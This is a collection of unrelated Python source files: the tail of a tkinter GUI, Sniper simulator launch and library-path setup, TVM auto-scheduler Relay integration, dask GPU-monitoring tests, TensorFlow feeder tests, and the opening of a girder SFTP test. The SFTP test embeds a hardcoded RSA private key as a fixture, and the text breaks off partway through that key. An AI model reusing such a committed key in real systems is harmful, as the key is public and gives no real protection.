streamermessageLabel.configure(background='#404040', fg='#FFFFFF')
streamermessageLabel.grid(row=9, column=0)
messageDelay = Scale(root, from_=2, to=15, orient=HORIZONTAL)
messageDelay.grid(row=10, column=0)
root.mainloop()
|
run_sniper.py
|
import sys, os, time, subprocess, threading, tempfile, sniper_lib
def Tee(filename, prefix = ''):
open(filename, 'w').close() # Make sure is writeable and empty
obj = subprocess.Popen(['bash', '-c', 'while read line; do echo "%s"$line; echo $line >> %s; done' % (prefix, filename)], stdin = subprocess.PIPE)
return obj.stdin.fileno()
def __run_program_redirect(app_id, program_func, program_arg, outputdir, run_id = 0):
prefix_fd = Tee(os.path.join(outputdir, 'benchmark-app%d-run%d.log' % (app_id, run_id)), '[app%d] ' % app_id)
os.dup2(prefix_fd, sys.stdout.fileno())
os.dup2(prefix_fd, sys.stderr.fileno())
program_func(program_arg)
def run_program_redirect(app_id, program_func, program_arg, outputdir, run_id = 0):
import multiprocessing # module does not exist in Python <= 2.5, import only when needed
proc = multiprocessing.Process(target = __run_program_redirect, args = (app_id, program_func, program_arg, outputdir, run_id))
proc.start()
proc.join()
def run_program_repeat(app_id, program_func, program_arg, outputdir):
global running
run_id = 0
while running:
print '[RUN-SNIPER] Starting application', app_id
run_program_redirect(app_id, program_func, program_arg, outputdir, run_id)
print '[RUN-SNIPER] Application', app_id, 'done'
time.sleep(1)
run_id += 1
def run_multi(snipercmd, applications, repeat = False, outputdir = '.'):
global running
running = True
p_sniper = subprocess.Popen([ 'bash', '-c', snipercmd ])
threads = []
for app in applications:
t = threading.Thread(target = repeat and run_program_repeat or run_program_redirect,
args = (app['app_id'], app['func'], app['args'], outputdir))
threads.append(t)
for t in threads:
t.start()
p_sniper.wait()
running = False # Simulator has ended, signal the benchmarks to stop restarting
time.sleep(2)
# Clean up benchmarks
sniper_lib.kill_children()
for t in threads:
t.join()
return p_sniper.returncode
# Determine libstdc++.so used by default by pin_sim.so using ldd
# Should take into account the current LD_LIBRARY_PATH
def get_cxx_inuse(sim_root, clear_ldlibpath = False):
pin_sim = '%s/lib/pin_sim.so' % sim_root
try:
ldd_out_name = tempfile.NamedTemporaryFile(delete = False).name
ldlpsave = None
if clear_ldlibpath:
ldlpsave = os.environ.get('LD_LIBRARY_PATH', None)
if ldlpsave:
del os.environ['LD_LIBRARY_PATH']
os.system('ldd %s > %s 2> /dev/null' % (pin_sim, ldd_out_name))
if ldlpsave:
os.environ['LD_LIBRARY_PATH'] = ldlpsave
ldd_out = open(ldd_out_name).read()
os.unlink(ldd_out_name)
libcxx_path = os.path.dirname([ line.split()[2] for line in ldd_out.split('\n') if 'libstdc++.so.6' in line ][0])
except Exception, e:
print >> sys.stderr, `e`
return None
return libcxx_path
# Find libstdc++.so version number in a given path
def get_cxx_version(path):
filename = os.path.join(path, 'libstdc++.so.6')
if os.path.exists(filename):
realname = os.path.realpath(filename)
try:
version = int(realname.split('.')[-1])
return version
except Exception, e:
print >> sys.stderr, `e`
return 0
else:
return 0
def get_cxx_override(sim_root, pin_home, arch):
# Find which libstdc++.so is newer: either the system default one (with or without the LD_LIBRARY_PATH), or the Pin one
cxx_versions = [get_cxx_inuse(sim_root), get_cxx_inuse(sim_root, clear_ldlibpath = True), '%s/%s/runtime/cpplibs' % (pin_home, arch)]
if 'BENCHMARKS_ROOT' in os.environ:
cxx_versions.append('%s/libs' % os.environ['BENCHMARKS_ROOT'])
cxx_override = sorted(map(lambda x:(get_cxx_version(x),x), cxx_versions), key=lambda x:x[0])[-1][1]
return cxx_override
# LD_LIBRARY_PATH setup
#
# There are many different versions of LD_LIBRARY_PATH to consider:
# - the initial LD_LIBRARY_PATH which will affect Python when running this script
# - the application being simulated (PIN_APP_LD_LIBRARY_PATH):
# SNIPER_APP_LD_LIBRARY_PATH, defaults to original LD_LIBRARY_PATH
# - the Sniper pintool or standalone executable and Pin itself (PIN_VM_LD_LIBRARY_PATH):
# Pin runtime libraries, system libstdc++ (depending on version),
# can be extended by setting SNIPER_SIM_LD_LIBRARY_PATH
# - scripts being run inside the simulator (SNIPER_SCRIPT_LD_LIBRARY_PATH): original LD_LIBRARY_PATH
# (e.g. mcpat when running powertrace.py)
def setup_env(sim_root, pin_home, arch, standalone = False):
env = dict(os.environ)
ld_library_path_orig = env.get('LD_LIBRARY_PATH', '')
# Construct Sniper/Pintool LD_LIBRARY_PATH
ld_library_path = []
# Make sure that our version of Python is used, not the system version normally found in cxx_override
ld_library_path.append('%s/python_kit/%s/lib' % (sim_root, arch))
cxx_override = get_cxx_override(sim_root, pin_home, arch)
ld_library_path.append(cxx_override)
if not standalone:
ld_library_path.append('%s/%s/runtime/cpplibs' % (pin_home, arch))
ld_library_path.append('%s/%s/runtime' % (pin_home, arch))
if 'SNIPER_SIM_LD_LIBRARY_PATH' in os.environ:
ld_library_path.append(os.environ['SNIPER_SIM_LD_LIBRARY_PATH'])
env['LD_LIBRARY_PATH'] = ':'.join(ld_library_path)
env['PIN_LD_RESTORE_REQUIRED'] = '1'
env['PIN_VM_LD_LIBRARY_PATH'] = env['LD_LIBRARY_PATH'] # Pin VM and Pintool (Sniper) use LD_LIBRARY_PATH as modified above
# Application LD_LIBRARY_PATH
if 'SNIPER_APP_LD_LIBRARY_PATH' in env:
env['PIN_APP_LD_LIBRARY_PATH'] = env['SNIPER_APP_LD_LIBRARY_PATH'] # Application uses explicit LD_LIBRARY_PATH
del env['SNIPER_APP_LD_LIBRARY_PATH']
else:
env['PIN_APP_LD_LIBRARY_PATH'] = ld_library_path_orig # Application uses original LD_LIBRARY_PATH
# Scripts LD_LIBRARY_PATH
env['SNIPER_SCRIPT_LD_LIBRARY_PATH'] = ld_library_path_orig # Scripts running inside Sniper use original LD_LIBRARY_PATH
# Other environment variables
if 'SNIPER_APP_LD_PRELOAD' in env:
env['PIN_APP_LD_PRELOAD'] = env['SNIPER_APP_LD_PRELOAD']
del env['SNIPER_APP_LD_PRELOAD']
elif 'LD_PRELOAD' in env:
env['PIN_APP_LD_PRELOAD'] = env['LD_PRELOAD']
env['LD_PRELOAD'] = ''
env['PYTHONPATH'] = '%s/scripts:%s' % (sim_root, os.getenv('PYTHONPATH') or '')
env['SNIPER_ROOT'] = sim_root
env['GRAPHITE_ROOT'] = sim_root
return env
|
relay_integration.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=unused-variable,invalid-name
"""
Integrate auto_scheduler into relay. It implements the following items:
1. Extract search tasks from a relay program
2. Provide auto-scheduling for all TOPI compute functions
"""
import logging
import json
import threading
import tvm
from tvm import autotvm, te, transform
from tvm.ir.transform import PassContext
from tvm.runtime import convert_to_object
from tvm.te.tensor import ComputeOp, PlaceholderOp, Tensor
from tvm.tir import expr as _expr
from . import _ffi_api
from .compute_dag import ComputeDAG
from .dispatcher import DispatchContext
from .search_task import SearchTask
from .workload_registry import register_workload_tensors
logger = logging.getLogger("auto_scheduler")
def call_all_topi_funcs(mod, params, target):
"""Call all TOPI compute to extract auto_scheduler tasks in a Relay program"""
# pylint: disable=import-outside-toplevel
from tvm import relay
from tvm.relay.backend import graph_runtime_codegen
# Turn off AutoTVM config not found warnings
old_autotvm_silent = autotvm.GLOBAL_SCOPE.silent
autotvm.GLOBAL_SCOPE.silent = True
with transform.PassContext(
opt_level=3,
config={"relay.backend.use_auto_scheduler": True},
disabled_pass={"AutoSchedulerLayoutRewrite"},
):
opt_mod, _ = relay.optimize(mod, target, params)
grc = graph_runtime_codegen.GraphRuntimeCodegen(None, target)
grc.codegen(opt_mod["main"])
autotvm.GLOBAL_SCOPE.silent = old_autotvm_silent
def extract_tasks(
mod, params, target, target_host=None, hardware_params=None, include_simple_tasks=False
):
"""Extract tuning tasks from a relay program.
Parameters
----------
mod: tvm.IRModule or relay.function.Function
The module or function to tune
params: dict of str to numpy array
The associated parameters of the program
target: Union[tvm.target.Target, str]
The compilation target
target_host: Optional[Union[tvm.target.Target, str]]
The host compilation target
hardware_params : Optional[HardwareParams]
Hardware parameters used for the search tasks
include_simple_tasks: bool
Whether to extract simple tasks that do not include complicated ops.
Returns
-------
tasks: List[SearchTask]
The tasks in this network
weights: List[int]
The weight (i.e. the number of appearance) of extracted tasks
"""
# pylint: disable=import-outside-toplevel
from tvm import relay
if isinstance(target, str):
target = tvm.target.Target(target)
if isinstance(target_host, str):
target_host = tvm.target.Target(target_host)
# Run the compiler to collect all TOPI calls during compilation.
env = TracingEnvironment(
TracingMode.EXTRACT_TASK if include_simple_tasks else TracingMode.EXTRACT_COMPLEX_TASK_ONLY
)
with env:
# Wrap build call in a new thread to avoid the conflict
# between python's multiprocessing and tvm's thread pool
build_thread = threading.Thread(target=call_all_topi_funcs, args=(mod, params, target))
build_thread.start()
build_thread.join()
# query the compile engine to get the number of occurrence of all tasks
engine = relay.backend.compile_engine.get()
use_count_dict = {}
for k, v in engine.items():
use_count_dict[k] = v.use_count
# create search tasks
tasks = []
weights = []
for wkl_key, ccache_key in env.wkl_key_to_ccache_key.items():
dag = ComputeDAG(wkl_key)
tasks.append(
SearchTask(
workload_key=wkl_key,
target=target,
target_host=target_host,
hardware_params=hardware_params,
)
)
weights.append(use_count_dict[ccache_key] + 1)
# clean the cached lowering results
engine.clear()
return tasks, weights
class TracingMode:
"""Two modes for tracing"""
EXTRACT_TASK = 0 # trace all topi calls to extract tasks
EXTRACT_COMPLEX_TASK_ONLY = 1 # same as EXTRACT_TASK but ignore the task without complex ops
PREPARE_LAYOUT_REWRITE = 2 # trace topi calls to prepare layout rewrite
class TracingEnvironment:
"""Global environment for tracing all topi function calls"""
current = None
def __init__(self, tracing_mode):
self.tracing_mode = tracing_mode
self.relay_disable_build_cache = "false"
self.wkl_key_to_ccache_key = {}
def __enter__(self):
TracingEnvironment.current = self
return self
def __exit__(self, exc_type, exc_val, exc_tb):
TracingEnvironment.current = None
def add_workload_key(self, workload_key, ccache_key):
"""Add the workload key of a search task
Parameters
----------
workload_key: str
The workload key of a task
ccache_key: CCacheKey
The corresponding ccache_key of the task
"""
self.wkl_key_to_ccache_key[workload_key] = ccache_key
@tvm._ffi.register_func("auto_scheduler.enter_layout_rewrite")
def enter_layout_rewrite():
"""Enter layout rewrite tracing environment"""
env = TracingEnvironment(TracingMode.PREPARE_LAYOUT_REWRITE)
env.__enter__()
@tvm._ffi.register_func("auto_scheduler.exit_layout_rewrite")
def exit_layout_rewrite():
"""Exit layout rewrite tracing environment"""
env = TracingEnvironment.current
env.__exit__(None, None, None)
def traverse_to_get_io_tensors(outs):
"""Traverse from a list of output tensors to get both input and output tensors
Parameters
----------
outs: List[Tensor]
The output tensors
Returns
-------
io_tensors: List[Tensor]
The input and output tensors
has_layout_free: bool
Whether the compute DAG has layout_free placeholders
"""
layout_free_ops = []
inputs = []
visited = set()
def traverse(t):
if t in visited:
return
if isinstance(t.op, PlaceholderOp):
inputs.append(t)
elif isinstance(t.op, ComputeOp):
if "layout_free_placeholders" in t.op.attrs:
layout_free_ops.append(t.op)
for x in t.op.input_tensors:
traverse(x)
visited.add(t)
for t in outs:
traverse(t)
has_layout_free = len(layout_free_ops) > 0
return inputs + list(outs), has_layout_free
@tvm._ffi.register_func("auto_scheduler.relay_integration.auto_schedule_topi_compute")
def auto_schedule_topi(outs, has_complex_op):
"""Use auto-scheduler to schedule any topi compute function.
Note: This is used internally for relay integration. Do
not use this as a general user-facing API.
Parameters
----------
outs: List[Tensor]
The output tensors of topi compute functions
has_complex_op: bool
Whether the topi compute function includes at least one complex op.
Returns
-------
sch: Optional[te.Schedule]
A tuned schedule or none (if not tuned) in the final build mode;
An initial schdule in the tracing mode.
"""
# pylint: disable=import-outside-toplevel
from tvm import relay
io_tensors, has_layout_free = traverse_to_get_io_tensors(outs)
try:
dag = ComputeDAG(io_tensors)
except tvm.error.TVMError as err:
logger.info("Failed to create a ComputeDAG for auto_scheduler: %s", str(err))
return None
key = register_workload_tensors(dag.hash_key(), io_tensors)
# only enable layout rewrite for cpu / mali backend
target = tvm.target.Target.current()
enable_layout_rewrite_targets = ["cpu", "mali"]
enable_layout_rewrite = any(
enable_layout_rewrite_target in target.keys
for enable_layout_rewrite_target in enable_layout_rewrite_targets
)
env = TracingEnvironment.current
if env is None:
# in the final build mode
state = DispatchContext.current.query(target, key, has_complex_op, dag)
if state is None:
return None
schedule, _ = dag.apply_steps_from_state(state)
elif env.tracing_mode in [TracingMode.EXTRACT_TASK, TracingMode.EXTRACT_COMPLEX_TASK_ONLY]:
# in the task extraction mode
if has_complex_op or env.tracing_mode == TracingMode.EXTRACT_TASK:
engine = relay.backend.compile_engine.get()
ccache_key = engine.get_current_ccache_key()
env.add_workload_key(key, ccache_key)
schedule = te.create_schedule([x.op for x in outs])
elif env.tracing_mode == TracingMode.PREPARE_LAYOUT_REWRITE:
# in prepare_layout_rewrite mode
if enable_layout_rewrite and has_layout_free:
dispatch_ctx = DispatchContext.current
state = dispatch_ctx.query(target, key, has_complex_op, dag)
if state is None:
return None
# rewrite the layout and update the context for the new dag
dag = ComputeDAG(outs)
new_dag = dag.rewrite_layout_from_state(state)
new_key = json.dumps((new_dag.hash_key(),))
if new_key != key:
dispatch_ctx.update(target, new_key, state)
return te.create_schedule([x.op for x in outs])
else:
raise ValueError("Invalid tracing mode: " + env.tracing_mode)
return schedule
def tensor_no_check_call(self, *indices):
"""An indexing function without any check.
This is the same as `tvm.te.Tensor::__call__` except that the safety
check is removed.
"""
indices = convert_to_object(indices)
args = []
for x in indices:
if isinstance(x, _expr.PrimExpr):
args.append(x)
elif isinstance(x, _expr.IterVar):
args.append(x.var)
else:
raise ValueError("The indices must be expression")
return _expr.ProducerLoad(self, args)
def remove_index_check(tensor):
"""Remove the safety check in the indexing function for a tensor.
This is done by monkey patching its indexing function.
After removing the check, we are allowed to create a
temporary wrong IR and fix it later in other places.
Parameters
----------
tensor: Tensor
The tensor to remove index check.
"""
# Monkey patch the indexing function
tensor.__call__ = tensor_no_check_call.__get__(tensor, Tensor)
def rewrite_compute_body(compute_tensor, new_layout):
"""Rewrite the body of a ComputeOp according to a new layout of a placeholder"""
op = compute_tensor.op
# Get layout free placeholders
layout_free_placeholders = op.attrs["layout_free_placeholders"]
assert len(layout_free_placeholders) == 1, "Only support one layout free placeholder"
placeholder_op = layout_free_placeholders[0].op
# Rewrite the index expression in body
body = []
for b in op.body:
body.append(_ffi_api.RewriteIndexForNewLayout(placeholder_op, new_layout, b))
op_node = tvm.te._ffi_api.ComputeOp(op.name, op.tag, op.attrs, op.axis, body)
num = op_node.num_outputs
outputs = tuple(op_node.output(i) for i in range(num))
return outputs[0] if num == 1 else outputs
def is_auto_scheduler_enabled():
"""Return whether the auto-scheduler is enabled.
Parameters
----------
enabled: bool
Whether the auto-scheduler is enabled
"""
return PassContext.current().config.get("relay.backend.use_auto_scheduler", False)
|
test_nvml.py
|
import multiprocessing as mp
import os
import pytest
pytestmark = pytest.mark.gpu
pynvml = pytest.importorskip("pynvml")
import dask
from distributed.diagnostics import nvml
from distributed.utils_test import gen_cluster
def test_one_time():
if nvml.device_get_count() < 1:
pytest.skip("No GPUs available")
output = nvml.one_time()
assert "memory-total" in output
assert "name" in output
assert len(output["name"]) > 0
def test_enable_disable_nvml():
try:
pynvml.nvmlShutdown()
except pynvml.NVMLError_Uninitialized:
pass
else:
nvml.nvmlInitialized = False
with dask.config.set({"distributed.diagnostics.nvml": False}):
nvml.init_once()
assert nvml.nvmlInitialized is False
with dask.config.set({"distributed.diagnostics.nvml": True}):
nvml.init_once()
assert nvml.nvmlInitialized is True
def run_has_cuda_context(queue):
try:
assert not nvml.has_cuda_context()
import numba.cuda
numba.cuda.current_context()
assert nvml.has_cuda_context() == 0
queue.put(None)
except Exception as e:
queue.put(e)
def test_has_cuda_context():
if nvml.device_get_count() < 1:
pytest.skip("No GPUs available")
# This test should be run in a new process so that it definitely doesn't have a CUDA context
# and uses a queue to pass exceptions back
ctx = mp.get_context("spawn")
queue = ctx.Queue()
p = ctx.Process(target=run_has_cuda_context, args=(queue,))
p.start()
p.join() # this blocks until the process terminates
e = queue.get()
if e is not None:
raise e
def test_1_visible_devices():
if nvml.device_get_count() < 1:
pytest.skip("No GPUs available")
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
output = nvml.one_time()
h = nvml._pynvml_handles()
assert output["memory-total"] == pynvml.nvmlDeviceGetMemoryInfo(h).total
@pytest.mark.parametrize("CVD", ["1,0", "0,1"])
def test_2_visible_devices(CVD):
if nvml.device_get_count() < 2:
pytest.skip("Less than two GPUs available")
os.environ["CUDA_VISIBLE_DEVICES"] = CVD
idx = int(CVD.split(",")[0])
h = nvml._pynvml_handles()
h2 = pynvml.nvmlDeviceGetHandleByIndex(idx)
s = pynvml.nvmlDeviceGetSerial(h)
s2 = pynvml.nvmlDeviceGetSerial(h2)
assert s == s2
@gen_cluster()
async def test_gpu_metrics(s, a, b):
if nvml.device_get_count() < 1:
pytest.skip("No GPUs available")
h = nvml._pynvml_handles()
assert "gpu" in a.metrics
assert (
s.workers[a.address].metrics["gpu"]["memory-used"]
== pynvml.nvmlDeviceGetMemoryInfo(h).used
)
assert "gpu" in a.startup_information
assert (
s.workers[a.address].extra["gpu"]["name"]
== pynvml.nvmlDeviceGetName(h).decode()
)
@gen_cluster()
async def test_gpu_monitoring_recent(s, a, b):
if nvml.device_get_count() < 1:
pytest.skip("No GPUs available")
h = nvml._pynvml_handles()
res = await s.get_worker_monitor_info(recent=True)
assert (
res[a.address]["range_query"]["gpu_utilization"]
== pynvml.nvmlDeviceGetUtilizationRates(h).gpu
)
assert (
res[a.address]["range_query"]["gpu_memory_used"]
== pynvml.nvmlDeviceGetMemoryInfo(h).used
)
assert res[a.address]["gpu_name"] == pynvml.nvmlDeviceGetName(h).decode()
assert res[a.address]["gpu_memory_total"] == pynvml.nvmlDeviceGetMemoryInfo(h).total
@gen_cluster()
async def test_gpu_monitoring_range_query(s, a, b):
if nvml.device_get_count() < 1:
pytest.skip("No GPUs available")
res = await s.get_worker_monitor_info()
ms = ["gpu_utilization", "gpu_memory_used"]
for w in (a, b):
assert all(res[w.address]["range_query"][m] is not None for m in ms)
assert res[w.address]["count"] is not None
assert res[w.address]["last_time"] is not None
|
feeder_test.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf.contrib.training.feeder."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import portpicker
from tensorflow.contrib.training.python.training import feeder as feeder_lib
from tensorflow.python.client import session as session_lib
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes as dtypes_lib
from tensorflow.python.framework import ops
from tensorflow.python.platform import test
from tensorflow.python.training import coordinator
from tensorflow.python.training import queue_runner_impl
from tensorflow.python.training import server_lib
_PORTS = set()
def _pick_unused_port():
"""For some reason portpicker returns the same port sometimes."""
while True:
p = portpicker.pick_unused_port()
if p not in _PORTS:
break
_PORTS.add(p)
return p
class FeederThread(object):
# Helper class, wrapping a feeder and making sure it's located on the proper
# device
def __init__(self, test_case, coord, servers, job, task_num, prefix=''):
self.graph = ops.Graph()
self.coord = coord
self.server = servers[job][task_num]
self.remote_devices = []
# Just because we do tf.session(X) doesn't mean ops will located
# on the X task; wrapping all feeder creation/interaction in an
# extra tf.device(X) ensures that any ops that don't provider
# their own tf.device() wrapper will be placed on the correct "local"
# feeder task. A session can and does put ops that have no device
# assignment onto any of the tasks it knows about, not just the
# task passed as its target= argument!
self.device = '/job:%s/task:%d' % (job, task_num)
self.prefix = prefix
self.thread = test_case.checkedThread(target=self._feed_thread)
with self.graph.as_default(), ops.device(self.device):
self.feeder = feeder_lib.Feeder(
[dtypes_lib.string, dtypes_lib.string], [[], []], capacity=1)
self.feeder.set_many_fed_tensors(self._get_feed_values())
def _get_feed_values(self):
# Return some feeding strings, possibly prefixed.
return [
constant_op.constant(
['%s%s' % (self.prefix, x) for x in ['a0', 'a1', 'a2']]),
constant_op.constant(
['%s%s' % (self.prefix, x) for x in ['b0', 'b1', 'b2']])
]
def add_remote_device(self, dev):
with self.graph.as_default(), ops.device(self.device):
self.feeder.add_remote_device(dev)
def start(self):
self.thread.start()
self.feeder.wait_until_feeding() # wait until it's up & feeding
if self.coord.should_stop():
self.coord.join() # rethrows errors encountered in run_feeding_forever
def join(self):
self.thread.join()
def _session(self):
return session_lib.Session(target=self.server.target)
def _feed_thread(self):
with self.coord.stop_on_exception():
with self.graph.as_default(), ops.device(self.device):
self.feeder.run_feeding_forever(self._session, self.coord)
class FeederTest(test.TestCase):
# Tests for Feeder
def _create_local_cluster(self, **kargs):
"""Creates a local cluster."""
cluster_dict = {}
for (k, v) in kargs.items():
cluster_dict[k] = [
'localhost:%d' % _pick_unused_port() for _ in range(v)
]
# Launch servers:
servers = {}
for (k, v) in kargs.items():
servers[k] = [
server_lib.Server(
cluster_dict, job_name=k, task_index=idx, start=True)
for idx in range(v)
]
return servers
def testFeederActsLikeQueue(self):
# Tests that a feeder acts like a queue
feeder = feeder_lib.Feeder(
dtypes=[dtypes_lib.string, dtypes_lib.string],
shapes=[[], []],
capacity=10)
feeder.set_many_fed_tensors([
constant_op.constant(['a0', 'a1', 'a2']),
constant_op.constant(['b0', 'b1', 'b2'])
])
out_a, out_b = feeder.get_fed_tensors()
with self.test_session() as session:
coord = coordinator.Coordinator()
queue_runner_impl.start_queue_runners(session, coord=coord)
a, b = session.run([out_a, out_b])
self.assertEquals(b'a0', a)
self.assertEquals(b'b0', b)
a = session.run(out_a) # Omit b!
self.assertEquals(b'a1', a)
a, b = session.run([out_a, out_b])
self.assertEquals(b'a2', a)
self.assertEquals(b'b2', b) # queued together
a, b = session.run([out_a, out_b]) # loops around
self.assertEquals(b'a0', a)
self.assertEquals(b'b0', b) # queued together
coord.request_stop()
coord.join()
def testFeederSeparateThread(self):
# Start a feeder on a separate thread, but with a shared local queue
servers = self._create_local_cluster(worker=1)
coord = coordinator.Coordinator()
feed_thread = FeederThread(self, coord, servers, 'worker', 0)
feed_thread.start()
with ops.Graph().as_default():
with ops.device('/job:worker/task:0'):
feeder = feeder_lib.Feeder(
dtypes=[dtypes_lib.string, dtypes_lib.string],
shapes=[[], []],
capacity=1)
out_a, out_b = feeder.get_fed_tensors()
with session_lib.Session(servers['worker'][0].target) as session:
a, b = session.run([out_a, out_b])
self.assertEquals(b'a0', a)
self.assertEquals(b'b0', b)
a = session.run(out_a) # Omit b!
self.assertEquals(b'a1', a)
coord.request_stop()
coord.join()
feed_thread.join()
def testOneEachFeeding(self):
# One feeder, one consumer
servers = self._create_local_cluster(consumer=1, feeder=1)
coord = coordinator.Coordinator()
feeder_thread = FeederThread(self, coord, servers, 'feeder', 0)
feeder_thread.add_remote_device('/job:consumer/task:0')
feeder_thread.start()
with ops.Graph().as_default():
with ops.device('/job:consumer/task:0'):
feeder = feeder_lib.Feeder(
dtypes=[dtypes_lib.string, dtypes_lib.string],
shapes=[[], []],
capacity=1)
out_a, out_b = feeder.get_fed_tensors()
with session_lib.Session(servers['consumer'][0].target) as session:
a, b = session.run([out_a, out_b])
self.assertEquals(b'a0', a)
self.assertEquals(b'b0', b)
a = session.run(out_a) # Omit b!
self.assertEquals(b'a1', a)
coord.request_stop()
coord.join()
feeder_thread.join()
def testMultipleProducersAndConsumers(self):
# Three feeders, three consumers.
servers = self._create_local_cluster(consumer=3, feeder=3)
coord = coordinator.Coordinator()
# Start the three feeders:
f0 = FeederThread(self, coord, servers, 'feeder', 0, prefix='feed0_')
f0.add_remote_device('/job:consumer/task:0')
f0.add_remote_device('/job:consumer/task:1')
f0.start()
f1 = FeederThread(self, coord, servers, 'feeder', 1, prefix='feed1_')
f1.add_remote_device('/job:consumer/task:2')
f1.add_remote_device('/job:consumer/task:0')
f1.start()
f2 = FeederThread(self, coord, servers, 'feeder', 2, prefix='feed2_')
f2.add_remote_device('/job:consumer/task:1')
f2.add_remote_device('/job:consumer/task:2')
f2.start()
# Three consumers.
def _run_consumer(task, expected_keys):
server = servers['consumer'][task]
# Runs until everything in expected_keys has been seen at least once;
# fails if any prefix not in expected_keys shows up
with ops.Graph().as_default(), ops.device('/job:consumer/task:%d' % task):
feeder = feeder_lib.Feeder(
dtypes=[dtypes_lib.string, dtypes_lib.string],
shapes=[[], []],
capacity=1)
out_a, out_b = feeder.get_fed_tensors()
counts = collections.Counter()
with session_lib.Session(server.target) as sess:
while True:
a, b = sess.run([out_a, out_b])
counts[a[:-1]] += 1
counts[b[:-1]] += 1
self.assertTrue(a[:-1] in expected_keys)
self.assertTrue(b[:-1] in expected_keys)
if all(counts[k] > 0 for k in expected_keys):
return
_run_consumer(0, [b'feed0_a', b'feed0_b', b'feed1_a', b'feed1_b'])
_run_consumer(1, [b'feed0_a', b'feed0_b', b'feed2_a', b'feed2_b'])
_run_consumer(2, [b'feed1_a', b'feed1_b', b'feed2_a', b'feed2_b'])
coord.request_stop()
coord.join()
f0.join()
f1.join()
f2.join()
def testAddRemoteReplicas(self):
with ops.Graph().as_default():
for idx in range(3):
with ops.name_scope('replica_%d' % idx):
feeder = feeder_lib.Feeder(
dtypes=[dtypes_lib.string, dtypes_lib.string],
shapes=[[], []],
capacity=10)
feeder.add_remote_replicas(
'consumer',
replica_count=3,
feeder_task_num=idx,
replicas_per_feeder=2,
base_device_spec='/device:cpu:0')
# Examine ops...
op_types_by_scope_and_device = collections.defaultdict(
lambda: collections.defaultdict(collections.Counter))
for op in ops.get_default_graph().get_operations():
scope = '/'.join(op.name.split('/')[:-1])
dev = op.device
op_types_by_scope_and_device[scope][dev][op.type] += 1
expected_ops = collections.Counter(
{'QueueEnqueueV2': 1, 'FIFOQueueV2': 1})
expected_enq_devices = [('replica_0', [
'/job:consumer/replica:0/device:cpu:0',
'/job:consumer/replica:1/device:cpu:0',
]), ('replica_1', [
'/job:consumer/replica:2/device:cpu:0',
'/job:consumer/replica:0/device:cpu:0',
]), ('replica_2', [
'/job:consumer/replica:1/device:cpu:0',
'/job:consumer/replica:2/device:cpu:0',
])]
for scope, devs in expected_enq_devices:
for dev in devs:
self.assertEqual(expected_ops,
op_types_by_scope_and_device[scope][dev])
if __name__ == '__main__':
test.main()
|
sftp_test.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright 2016 Kitware Inc.
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
import paramiko
import six
import socket
import stat
import threading
from .. import base
from girder.api import sftp
from six.moves import StringIO
server = None
TEST_PORT = 10551
TEST_KEY = paramiko.RSAKey.from_private_key(StringIO("""-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAwdH5tlaZu52adYvW57DcAFknzOKX8+/axDmQdTcg1HwEOnT2
TMSFGciwUQMmya+0i23ZOUtZQutj8fb66szrBZ7qpIvSG6TRyxGuM6PkfAUcBCHO
TGFzaJPnnvUXC8dlxoUIdBaUCmSblvj2q2CTNy53ybAmiiSpahjvBO16pvjbNn+i
EGucSQn71OTMhoSOWtS/VcJC6JPd6kxSdl1EiESbOrjAdNDKMBnfYCkxPG4ulAqe
y5jpfgQiUC0Q3CoWbj/ybAv73JsFndPcpvI8n5EsXeptuWI4CXSorYOuVwURLuzP
z1PkI4ZsYnSnuQG/GReAZnwVDaVJ/uhYMMs1sQIDAQABAoIBADKOmguFBW7aCntU
8cbX7Fsu5mHcTXS1ASSkO1lH+wlSHCw/bCvUKz/xiIRpRQnhCkBAdCQs0mjRS+3G
1ea/cyKxNFWdnz3UvWCyCPWxb50mHAu74bssxFToF8fv+IX7CkJBW1YkuZMIcUlt
QbKsa1o+hcKXb0YjkAl73YU0iQTaet7B1x1X0qkVPEWWURTg3z65TNI96t8p28dh
4HgEoU0Jtfsfzb7u1H4/m3Q28J1S+cTkER/VIgLzMeYXr2MooIQc3QAMXATpXkhM
y6u0LYh+kW1XD4ZnyzTp49BMf76rS8VhsYN6f+jLhJUf/5O+m8NFGuCq15TFyQAH
vMBxPRECgYEA4+fxYuuOq+SilYpejD4EMwvrClixHOfTojlnAyUaJZSnyVp/Y4l+
QmFmbNpfRKN1fv24e9f9CmA8nd5A3kxBjJFhzaaxbFG+jI47fqOu9NadXPHaxvyq
BI2aHx4sqp/Z/ct/klht5hxD8UFMRFbaaLYAojKg1nL0g/88wwwN9LUCgYEA2bZh
873OGT7sNXHin2rXD5XEYXqjLy51hed4ZdtJXFrKhg8ozWqaOZ79GXustdRanzTV
zDeTweI0hg7adbKyBNeuQF8VSOK6ws2wPPCuUbQTVYaepqPuT+VhzAB1GVJ1uF/T
